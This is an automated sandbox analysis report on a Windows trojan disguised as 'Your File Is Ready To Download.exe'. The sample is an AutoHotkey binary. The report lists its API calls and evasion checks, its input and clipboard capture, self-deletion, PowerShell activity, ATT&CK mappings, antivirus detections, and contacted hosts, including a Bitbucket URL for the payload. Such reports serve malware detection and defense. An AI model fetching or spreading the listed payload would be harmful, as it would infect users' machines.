Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140022711 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 00000001400228E9h country: Urdu (ur)1_2_0000000140022711
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140022711 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 00000001400228E9h country: Inuktitut (iu)1_2_0000000140022711
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140022735 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 00000001400228E9h country: Urdu (ur)1_2_0000000140022735
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140022735 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 00000001400228E9h country: Inuktitut (iu)1_2_0000000140022735
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3930Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5126Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000409Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeAPI coverage: 4.5 %
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140018A201_2_0000000140018A20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400ACC40 FindFirstFileW,FindClose,FindFirstFileW,FindClose,1_2_00000001400ACC40
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014003C320 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,1_2_000000014003C320
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400667A0 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,1_2_00000001400667A0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140080A40 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,wcsncpy,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,1_2_0000000140080A40
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140066AE0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,malloc,1_2_0000000140066AE0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400ACB40 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00000001400ACB40
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140081030 GetFileAttributesW,FindFirstFileW,FindClose,1_2_0000000140081030
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140067130 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,1_2_0000000140067130
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: Your File Is Ready To Download.exe, 00000001.00000002.369346685.000000000015A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW6%
Source: Your File Is Ready To Download.exe, 00000001.00000002.369346685.000000000015A000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000002.369250966.00000000000F3000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368850888.00000000000F3000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400D0790 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00000001400D0790
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014009E010 SendMessageW,SendMessageW,SendMessageW,LoadLibraryW,GetProcAddress,SendMessageW,SendMessageW,SendMessageW,1_2_000000014009E010
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400D6D5C GetProcessHeap,HeapAlloc,_errno,_errno,__doserrno,_errno,GetProcessHeap,HeapFree,SetEndOfFile,_errno,__doserrno,GetLastError,1_2_00000001400D6D5C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140014BA0 CloseHandle,CreateMutexW,GetLastError,CloseHandle,GetWindowThreadProcessId,AttachThreadInput,GetTickCount,GetCurrentThreadId,GetAsyncKeyState,GetAsyncKeyState,GetForegroundWindow,GetWindowThreadProcessId,GetGUIThreadInfo,GetWindowThreadProcessId,GetKeyboardLayout,GetProcAddress,FreeLibrary,GetTickCount,BlockInput,GetTickCount,PeekMessageW,GetTickCount,PostMessageW,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput,GetTickCount,GetForegroundWindow,GetWindowThreadProcessId,1_2_0000000140014BA0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400D2224 SetUnhandledExceptionFilter,1_2_00000001400D2224
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400D0790 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00000001400D0790
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140016D90 GetCurrentThreadId,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,BlockInput,GetForegroundWindow,GetAsyncKeyState,keybd_event,GetAsyncKeyState,keybd_event,GetAsyncKeyState,BlockInput,1_2_0000000140016D90
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400415D0 CreateProcessW,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,CloseHandle,GetLastError,FormatMessageW,1_2_00000001400415D0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximizedJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400185A0 mouse_event,1_2_00000001400185A0
Source: Your File Is Ready To Download.exe, 00000001.00000002.369525393.00000000007F1000.00000004.00000001.sdmpBinary or memory string: ProgmanidgetWin_1Ye
Source: Your File Is Ready To Download.exeBinary or memory string: Program Manager
Source: Your File Is Ready To Download.exeBinary or memory string: Shell_TrayWnd
Source: Your File Is Ready To Download.exeBinary or memory string: Progman
Source: Your File Is Ready To Download.exeBinary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowDwmGetWindowAttributedwmapi.dllahk_idpidgroup%s%uProgram ManagerProgmanWorkerWError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014001FD1E SetCurrentDirectoryW,malloc,GetSystemTimeAsFileTime,1_2_000000014001FD1E
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400CD9B4 HeapCreate,GetVersion,HeapSetInformation,1_2_00000001400CD9B4
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140068C10 GetComputerNameW,GetUserNameW,1_2_0000000140068C10
Source: Your File Is Ready To Download.exeBinary or memory string: WIN_XP
Source: Your File Is Ready To Download.exeBinary or memory string: ?*A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowLogoffSingle1.1.33.06\AutoHotkey.exeWIN32_NTWIN_8.1WIN_8WIN_7WIN_VISTAWIN_XPWIN_2003%04hX0x%Ix*pPIntStrPtrShortInt64DoubleAStrWStrgdi32comctl32kernel32W-3-4CDecl-2This DllCall requires a prior VarSetCapacity.Pos%sLen%sPos%dLen%dLenMarkpcre_calloutCompile error %d at offset %d: %hs-+0 #diouxXeEfgGaAcCpULlTt%0.*fFfSelectVisCenterUniDescLogicalNoSortAutoHdrFirstBoldExpandGDI+JoyJoyXJoyYJoyZJoyRJoyUJoyVJoyPOVJoyNameJoyButtonsJoyAxesJoyInfo
Source: Your File Is Ready To Download.exeBinary or memory string: WIN_VISTA
Source: Your File Is Ready To Download.exeBinary or memory string: WIN_7
Source: Your File Is Ready To Download.exeBinary or memory string: WIN_8
Source: Your File Is Ready To Download.exeBinary or memory string: WIN_8.1
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014001E310 PostThreadMessageW,Sleep,GetTickCount,GetExitCodeThread,GetTickCount,Sleep,CloseHandle,CreateMutexW,CloseHandle,CreateMutexW,CloseHandle,Shell_NotifyIconW,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,RemoveClipboardFormatListener,ChangeClipboardChain,mciSendStringW,mciSendStringW,DeleteCriticalSection,OleUninitialize,1_2_000000014001E310
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140072DC0 RemoveClipboardFormatListener,ChangeClipboardChain,1_2_0000000140072DC0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014001EFA0 AddClipboardFormatListener,PostMessageW,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain,1_2_000000014001EFA0

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsNative API1Path InterceptionExploitation for Privilege Escalation1Disable or Modify Tools1Input Capture21System Time Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsCommand and Scripting Interpreter2Boot or Logon Initialization ScriptsAccess Token Manipulation1Deobfuscate/Decode Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Process Injection12Obfuscated Files or Information1Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesInput Capture21Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSSystem Information Discovery34Distributed Component Object ModelClipboard Data2Scheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsSecurity Software Discovery131SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading3Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion21DCSyncVirtualization/Sandbox Evasion21Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemApplication Window Discovery11Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection12/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 535019 Sample: Your File Is Ready To Downl... Startdate: 06/12/2021 Architecture: WINDOWS Score: 51 48 Antivirus / Scanner detection for submitted sample 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 Self deletion via cmd delete 2->52 54 Contains functionality to detect sleep reduction / modifications 2->54 7 Your File Is Ready To Download.exe 14 2->7         started        process3 dnsIp4 38 bitbucket.org 104.192.141.1, 443, 49711 AMAZON-02US United States 7->38 40 s3-w.us-east-1.amazonaws.com 52.217.81.204, 443, 49712 AMAZON-02US United States 7->40 42 2 other IPs or domains 7->42 56 Self deletion via cmd delete 7->56 58 Sample or dropped binary is a compiled AutoHotkey binary 7->58 11 chrome.exe 14 419 7->11         started        15 powershell.exe 28 7->15         started        17 cmd.exe 1 7->17         started        signatures5 process6 dnsIp7 44 192.168.2.1 unknown unknown 11->44 46 239.255.255.250 unknown Reserved 11->46 26 C:\...\pnacl_public_x86_64_pnacl_sz_nexe, ELF 11->26 dropped 28 C:\...\pnacl_public_x86_64_pnacl_llc_nexe, ELF 11->28 dropped 30 C:\Users\user\...\pnacl_public_x86_64_ld_nexe, ELF 11->30 dropped 19 chrome.exe 16 11->19         started        22 conhost.exe 15->22         started        24 conhost.exe 17->24         started        file8 process9 dnsIp10 32 www.google.com 142.250.181.228, 443, 49715, 49717 GOOGLEUS United States 19->32 34 accounts.google.com 142.250.185.109, 443, 49713 GOOGLEUS United States 19->34 36 4 other IPs or domains 19->36

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Your File Is Ready To Download.exe19%VirustotalBrowse
Your File Is Ready To Download.exe9%MetadefenderBrowse
Your File Is Ready To Download.exe11%ReversingLabsWin64.Trojan.Generic
Your File Is Ready To Download.exe100%AviraTR/Agent.pwc

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe0%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
1.0.Your File Is Ready To Download.exe.140000000.0.unpack100%AviraTR/Agent.pwcDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://betasupreme.com/uninstalled/0%Avira URL Cloudsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://betasupreme.com/thankyou/0%VirustotalBrowse
https://betasupreme.com/thankyou/0%Avira URL Cloudsafe
https://autohotkey.comCould0%URL Reputationsafe
https://dns.google0%URL Reputationsafe
https://sectigo.com/CPS00%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://betasupreme.com/i/?checksafe=0%Avira URL Cloudsafe
https://go.micro0%URL Reputationsafe
https://www.google.com;0%Avira URL Cloudsafe
https://contoso.com/Icon0%URL Reputationsafe
https://betasupreme.com/i/?nx=0%Avira URL Cloudsafe
https://betasupreme.com0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
s3-w.us-east-1.amazonaws.com
52.217.81.204
truefalse
    high
    bitbucket.org
    104.192.141.1
    truefalse
      high
      accounts.google.com
      142.250.185.109
      truefalse
        high
        www.google.com
        142.250.181.228
        truefalse
          high
          clients.l.google.com
          142.250.186.78
          truefalse
            high
            googlehosted.l.googleusercontent.com
            142.250.186.65
            truefalse
              high
              clients2.googleusercontent.com
              unknown
              unknownfalse
                high
                bbuseruploads.s3.amazonaws.com
                unknown
                unknownfalse
                  high
                  clients2.google.com
                  unknown
                  unknownfalse
                    high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://bitbucket.org/betadevmode/devmode/downloads/block-floc.zipfalse
                      high
                      https://clients2.googleusercontent.com/crx/blobs/Acy1k0bLIjHsvnKaKN_oRpVaYYvFs25d7GKYF1WXrT6yizCMksBO0c_ggE0B6tx6HPRHe6q1GOEe3_NcIbSiGG8kXeLMUY0sAKVvC6R89zvKM13s5VqoAMZSmuUgjQL5vlygJuArQghXXE_qTL7NlQ/extension_8520_615_0_5.crxfalse
                        high
                        https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                          high
                          https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1false
                            high
                            https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                              high
                              https://www.google.com/async/newtab_promosfalse
                                high
                                https://www.google.com/async/ddljson?async=ntp:1false
                                  high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://apis.google.com/js/client.jsmirroring_common.js.11.drfalse
                                    high
                                    https://autohotkey.comYour File Is Ready To Download.exefalse
                                      high
                                      https://play.google.comc0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.drfalse
                                        high
                                        https://betasupreme.com/uninstalled/powershell.exe, 00000008.00000002.319612768.000002691E865000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319462059.000002691E732000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319598583.000002691E851000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://contoso.com/Licensepowershell.exe, 00000008.00000002.329343916.000002692DE46000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://crash.corp.google.com/samples?reportid=&q=common.js.11.dr, mirroring_cast_streaming.js.11.drfalse
                                          high
                                          https://www.google.com/log?format=json&hasfast=truemirroring_hangouts.js.11.drfalse
                                            high
                                            http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions-01mirroring_hangouts.js.11.drfalse
                                              high
                                              https://preprod-hangouts-googleapis.sandbox.google.commirroring_hangouts.js.11.drfalse
                                                high
                                                https://www.google.commanifest.json.11.dr, c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.drfalse
                                                  high
                                                  https://hangouts.clients6.google.commirroring_hangouts.js.11.drfalse
                                                    high
                                                    https://meet.google.commirroring_common.js.11.drfalse
                                                      high
                                                      https://hangouts.google.com/hangouts/_/logprefmirroring_hangouts.js.11.drfalse
                                                        high
                                                        https://accounts.google.commanifest.json.11.dr, c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.drfalse
                                                          high
                                                          https://clients2.google.com/cr/reportmirroring_hangouts.js.11.dr, mirroring_cast_streaming.js.11.drfalse
                                                            high
                                                            https://contoso.com/powershell.exe, 00000008.00000002.329343916.000002692DE46000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.329343916.000002692DE46000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://creativecommons.org/publicdomain/zero/1.0/.mirroring_hangouts.js.11.drfalse
                                                                high
                                                                https://apis.google.commanifest.json.11.dr, c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.drfalse
                                                                  high
                                                                  https://bitbucket.org/betadevmode/devmode/downloads/block-floc.zipBsYour File Is Ready To Download.exe, 00000001.00000002.369250966.00000000000F3000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368850888.00000000000F3000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.317826184.000002691DDE1000.00000004.00000001.sdmpfalse
                                                                      high
